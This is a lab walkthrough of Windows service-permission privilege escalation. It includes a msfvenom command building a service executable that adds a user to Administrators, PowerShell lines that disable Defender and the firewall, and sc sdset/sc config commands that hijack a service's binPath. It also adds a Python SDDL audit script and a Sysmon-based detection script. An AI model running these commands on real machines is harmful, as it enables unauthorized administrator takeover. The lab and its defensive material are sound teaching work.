Windows Privilege Escalation
Using WinPeas
Making use of a service that low-privileged users are allowed to reconfigure (the exercise is labelled as an unquoted service path example, but what actually makes it exploitable is the permission granted with sc sdset below).
The target Windows machine has a non-privileged user: localuser.
Use msfvenom to generate an executable (ASCService.exe) that adds localuser to the local Administrators group.
1. Generate the payload using msfvenom
#Generate the malicious exe
msfvenom -p windows/exec CMD='net localgroup administrators localuser /add' -f exe-service -o ASCService.exe
2. Start a web server on the attack machine
# python server
python3 -m http.server
3. Disable Windows Defender & Firewall on the victim Windows machine
Run the following in an elevated (Administrator) PowerShell:
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -MAPSReporting 0
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
4. Connect back to the attack machine from the Windows victim via browser

Navigate to the attack machine's web server and download the payloads (ASCService.exe and winPEAS).

Move these downloads to the C:\ folder (the service binPath will point at c:\ASCService.exe later).
Next we will need to add permissions so that the local users are able to start and stop the service. This is how we simulate excessive permissions on a service.
# Run cmd as administrator
sc sdset AdvancedSystemCareService9 D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
You should see a response of [SC] SetServiceObjectSecurity SUCCESS.
Run Command Prompt as a different user (localuser)
Search cmd > right click > Run as different user
Check which accounts are in the local Administrators group:
C:\> net localgroup administrators

Run winPEAS.exe

Run the services information check:
C:\> winPEASx64.exe cmd servicesinfo
Two sections often used for privilege escalation are "Interesting Services -non Microsoft-" and "Modifiable Services".
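The sc sdset descriptor above and winPEAS's "Modifiable Services" finding are two views of the same defect: an allow-ACE that gives a low-privileged principal (here WD, Everyone) SERVICE_CHANGE_CONFIG and WRITE_DAC on the service. The following script is an added audit example, not part of the original page or of winPEAS; it parses the DACL portion of a service SDDL string (as printed by `sc sdshow`) and reports which low-privileged SIDs hold takeover rights. PAGE_SDDL is the exact descriptor from the walkthrough; HARDENED_SDDL is a constructed variant with the Everyone allow-ACE removed. The hex-mask branch and the medium-severity start/stop rule are additions that go beyond the page's single case.

```python
import re

# Two-letter SDDL rights tokens as Windows interprets them on a *service* object.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE", "GR": "GENERIC_READ",
    "GX": "GENERIC_EXECUTE", "FA": "FILE_ALL_ACCESS",
}
# Raw access-mask bits, for ACEs that carry a hex mask instead of tokens.
MASK_BITS = {
    0x0002: "SERVICE_CHANGE_CONFIG", 0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
    0x10000: "DELETE", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
    0x10000000: "GENERIC_ALL", 0x40000000: "GENERIC_WRITE",
}
# Rights that let the holder change what the service executes, or rewrite its DACL.
TAKEOVER = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER", "DELETE",
            "GENERIC_ALL", "GENERIC_WRITE", "FILE_ALL_ACCESS"}
# Well-known SID aliases/SIDs for principals that every local user effectively is.
LOW_PRIV = {
    "WD": "Everyone", "AU": "Authenticated Users", "IU": "Interactive", "BU": "Users",
    "BG": "Guests", "AN": "Anonymous", "S-1-1-0": "Everyone",
    "S-1-5-11": "Authenticated Users", "S-1-5-4": "Interactive", "S-1-5-32-545": "Users",
}

# The exact descriptor the walkthrough applies with `sc sdset`.
PAGE_SDDL = ("D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)(A;;CCLCSWLOCRRC;;;IU)"
             "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Constructed hardened variant: the Everyone (WD) allow-ACE is gone; only the audit ACE names WD.
HARDENED_SDDL = ("D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                 "(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def decode_rights(field):
    """Turn an ACE rights field (two-letter tokens or a 0x mask) into a set of right names."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {name for bit, name in MASK_BITS.items() if mask & bit}
    return {SERVICE_RIGHTS.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2)}


def parse_dacl(sddl):
    """Return (ace_type, rights, sid) for each ACE in the DACL (D:) part; the SACL is ignored."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        fields = body.split(";")          # type;flags;rights;object_guid;inherit_guid;sid
        if len(fields) < 6:
            continue
        aces.append((fields[0], decode_rights(fields[2]), fields[5]))
    return aces


def audit_service_sddl(sddl):
    """Report allow-ACEs that hand low-privileged principals control over the service."""
    findings = []
    for ace_type, rights, sid in parse_dacl(sddl):
        if ace_type != "A" or sid not in LOW_PRIV:   # only 'allow' ACEs grant anything
            continue
        dangerous = rights & TAKEOVER
        if dangerous:
            findings.append({"sid": sid, "principal": LOW_PRIV[sid],
                             "rights": sorted(dangerous), "severity": "high"})
        elif {"SERVICE_START", "SERVICE_STOP"} & rights:
            # Start/stop alone is not a takeover, but it is what turns a writable
            # service binary into code execution as the service account.
            findings.append({"sid": sid, "principal": LOW_PRIV[sid],
                             "rights": sorted({"SERVICE_START", "SERVICE_STOP"} & rights),
                             "severity": "medium"})
    return findings


if __name__ == "__main__":
    for label, sddl in (("page", PAGE_SDDL), ("hardened", HARDENED_SDDL)):
        print(label, audit_service_sddl(sddl))
```

Against PAGE_SDDL the only finding is Everyone with DELETE, SERVICE_CHANGE_CONFIG, WRITE_DAC and WRITE_OWNER; the IU ACE is read-only (query, interrogate, read control) and is not reported, and the audit ACE in the S: part that also names WD grants nothing. The hardened descriptor produces no findings, which is the state `sc sdshow` should report on a production host.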
Now query the service:
sc qc AdvancedSystemCareService9
# This service runs as LocalSystem
Next, confirm that localuser can stop and start the service:
net stop AdvancedSystemCareService9
Now modify the service binPath to point to our executable (the one that adds localuser to Administrators):
sc config AdvancedSystemCareService9 binpath= "c:\ASCService.exe"
Now start the service, which runs our payload executable:
net start AdvancedSystemCareService9
Because we can modify the service itself, the service (running as LocalSystem) adds localuser to the local Administrators group. Verify:
net localgroup administrators
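From the blue-team side, the chain above leaves two distinctive records: a registry write to the service's ImagePath value (Sysmon Event ID 13, since `sc config ... binpath=` is persisted under HKLM\System\CurrentControlSet\Services\<name>\ImagePath) pointing at a binary outside the usual program directories, followed by Security Event ID 4732 (member added to a security-enabled local group) for Administrators. The script below is an added detection example, not part of the original page; the JSON event lines are constructed to mimic a Sysmon/Event Log export and the field names (TargetObject, Details, MemberName, TargetUserName) are the standard ones for those event IDs. TRUSTED_ROOTS and the rule names are assumptions of this example.

```python
import json

# Roots a service binary is expected to live under; anything else
# (C:\ root, Temp, user profiles) is treated as user-controllable.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed events in the shape of a Sysmon / Windows Event Log JSON export; not real telemetry.
SAMPLE_EVENTS = [
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 13,
     "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VendorUpdate\\ImagePath",
     "Details": "\"C:\\Program Files\\Vendor\\update.exe\" -svc"},       # benign vendor install
    {"Channel": "Security", "EventID": 4624, "TargetUserName": "localuser", "LogonType": 2},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 13,
     "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\AdvancedSystemCareService9\\ImagePath",
     "Details": "c:\\ASCService.exe"},                                   # binPath now in C:\ root
    {"Channel": "Security", "EventID": 4732, "SubjectUserName": "SYSTEM",
     "MemberName": "DESKTOP-LAB\\localuser", "TargetUserName": "Administrators"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]


def binary_from_imagepath(value):
    """Extract the executable path from an ImagePath value, dropping the \\??\\ prefix, quotes and arguments."""
    v = value.strip()
    if v.startswith("\\??\\"):
        v = v[4:]
    if v.startswith('"'):
        end = v.find('"', 1)
        return v[1:end] if end > 0 else v[1:]
    return v.split(" ", 1)[0]


def service_from_key(target_object):
    """...\\Services\\<name>\\ImagePath -> <name>; None for any other registry value."""
    parts = target_object.replace("/", "\\").split("\\")
    low = [p.lower() for p in parts]
    if len(low) >= 3 and low[-1] == "imagepath" and low[-3] == "services":
        return parts[-2]
    return None


def evaluate(event):
    """Apply the two rules to one parsed event; return an alert dict or None."""
    channel, eid = event.get("Channel"), event.get("EventID")
    if channel == "Microsoft-Windows-Sysmon/Operational" and eid == 13:
        svc = service_from_key(event.get("TargetObject", ""))
        if svc:
            exe = binary_from_imagepath(event.get("Details", ""))
            if not exe.lower().startswith(TRUSTED_ROOTS):
                return {"rule": "service_imagepath_untrusted", "service": svc, "binary": exe,
                        "writer": event.get("Image")}
    if channel == "Security" and eid == 4732 \
            and event.get("TargetUserName", "").lower() == "administrators":
        return {"rule": "local_admin_group_change", "member": event.get("MemberName"),
                "by": event.get("SubjectUserName")}
    return None


def detect(lines):
    """Run the rules over JSON event lines and return the alerts in log order."""
    alerts = []
    for line in lines:
        alert = evaluate(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a)
```

On the sample log the vendor ImagePath under Program Files and the interactive logon are ignored, while the ImagePath rewrite to c:\ASCService.exe and the Administrators group change both fire. Correlating the two on a host within a short window is the high-confidence version of this detection; the ImagePath rule alone also catches legitimate but sloppy installs, which is itself worth a ticket.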